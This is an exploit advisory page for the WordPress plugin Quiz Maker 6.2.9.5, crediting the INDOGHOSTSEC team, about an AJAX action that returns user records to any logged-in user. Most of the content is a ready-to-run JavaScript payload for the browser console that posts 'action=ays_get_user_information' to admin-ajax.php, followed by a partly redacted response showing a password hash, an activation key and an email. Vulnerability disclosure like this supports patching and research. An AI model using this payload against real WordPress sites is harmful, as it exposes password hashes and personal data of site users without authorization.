Quiz Maker 6.2 - Sensitive Data Exposure (Authenticated User Credentials)

2022.01.26
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Quiz Maker 6.2 - Sensitive Data Exposure (User Credentials) # Exploit Author: Gh05t666nero # Team: INDOGHOSTSEC # Date: 24/01/2022 # Vendor : Quiz Maker team # Product: https://wordpress.org/plugins/quiz-maker # Version: 6.2.9.5 # Summary: Quiz Maker plugin allows you to create powerful and engaging quizzes, tests, and exams within minutes. This WordPress plugin offers dozens of options to build fully customizable and advanced level exams. You can build an unlimited number of quizzes and questions. No limit on the count of participants taking the test at the same time. # Descripion: The plugin was able to access user credentials such as passwords via a request made by an authenticated user (Not necessarily Administrator) # Tested on: Wordpress 5.8+ # Vulnerability discovered by Gh05t666nero (Ojan) | Cyber Security Foundation Professional Certificate (CSFPC) # Make sure you are logged in and run the Payload below using console menu in Devtools:- var xhr = new XMLHttpRequest(); xhr.open('POST', '/wp-admin/admin-ajax.php', true); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); xhr.onload = function () { console.log(this.responseText); }; xhr.send("action=ays_get_user_information"); # Response (sensored): { "data": { "ID": "30", "user_login": "ojan", "user_pass": "$P$Bm8d[REDACTED]WhKu0", "user_nicename": "ojan", "user_email": "ojan[REDACTED].com", "user_url": "", "user_registered": "202[REDACTED]7:09", "user_activation_key": "1642[REDACTED]06:$P$Bo[REDACTED]cD1O/", "user_status": "0", "display_name": "M[REDACTED]a" }, "ID": 30, "caps": { "um_eb": true }, "cap_key": "wp_capabilities", "roles": [ "um_eb" ], "allcaps": { "read": true, "um_eb": true }, "filter": null }


Vote for this issue:
87%
13%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top